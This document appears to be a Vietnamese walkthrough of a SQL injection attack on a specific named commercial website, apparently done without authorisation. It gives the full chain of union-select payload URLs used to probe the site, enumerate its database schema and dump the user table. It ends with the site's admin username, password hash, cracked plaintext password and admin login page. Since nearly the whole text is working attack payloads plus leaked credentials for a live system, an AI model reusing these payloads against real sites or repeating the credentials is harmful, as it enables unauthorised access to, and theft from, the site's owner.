1. Web hack: http://tranhtheu.net.vn/
+ Sau khi thêm dấu “ ‘ “ sau “1418”.
+ sau khi thêm union select 1-- sau 1418, xóa “ ’ ”
:http://tranhtheu.net.vn/?frame=product_detail&id=1418%20union%20select%201--

2. +Sau khi thử từ 2, 3, 4,…….20--
:http://tranhtheu.net.vn/?frame=product_detail&id=1418%20union%20select%201,2%20,%203,%2
04,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,
%2019,%2020--
+Sau khi thay
1418=null:http://tranhtheu.net.vn/?frame=product_detail&id=null%20union%20select%201,2%
20,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2
017,%2018,%2019,%2020--

3. +Sau khi thay
“3=version()”:http://tranhtheu.net.vn/?frame=product_detail&id=null%20union%20select%201,2
%20,%20version(),%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,
%2016,%2017,%2018,%2019,%2020—

4. +Sau khi thay “7=group_concat(unhex(hex(table_name))) và “from
information_schema.tables—“ ở cuối link”:
+Sau khi thay “version()=group_concat(unhex(hex(column_name)))” và
group_concat(unhex(hex(table_name)))=7: from information_schema.tables--=from
information_schema.columns where table_name=char(116,98,108,95,117,115,101,114)--
http://tranhtheu.net.vn/?frame=product_detail&id=null%20union%20select%201,2%20,%20group_
concat(unhex(hex(column_name))),%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%201
3,%2014,%2015,%2016,%2017,%2018,%2019,%2020%20from%20information_schema.columns%20
where%20table_name=char(116,98,108,95,117,115,101,114)--

5. +Sau khi thay “uid=group_concat(unhex(hex(column_name)))” và from
information_schema.columns where table_name=char(116,98,108,95,117,115,101,114)--=from
tbl_user—
http://tranhtheu.net.vn/?frame=product_detail&id=null%20union%20select%201,2%20,%20uid,%2
04,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,
%2019,%2020%20from%20tbl_user--
Ta được ID: q_computer
+Sau khi thay
“uid=pwd”http://tranhtheu.net.vn/?frame=product_detail&id=null%20union%20select%201,2%
20,%20pwd,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,
%2017,%2018,%2019,%2020%20from%20tbl_user--
Ta được pass: f278bf16e8a9e7b059adb7afad746eed
Sau khi dùng phần mềm Md5crack để mã hóa chuỗi pass trên ta
đượcpass : quanglk12

6. +Gõ địa chỉ để đăng nhập vào quyền admin: http://tranhtheu.net.vn/admin/login.php
Nhập ID: q_computer
Pass: quanglk12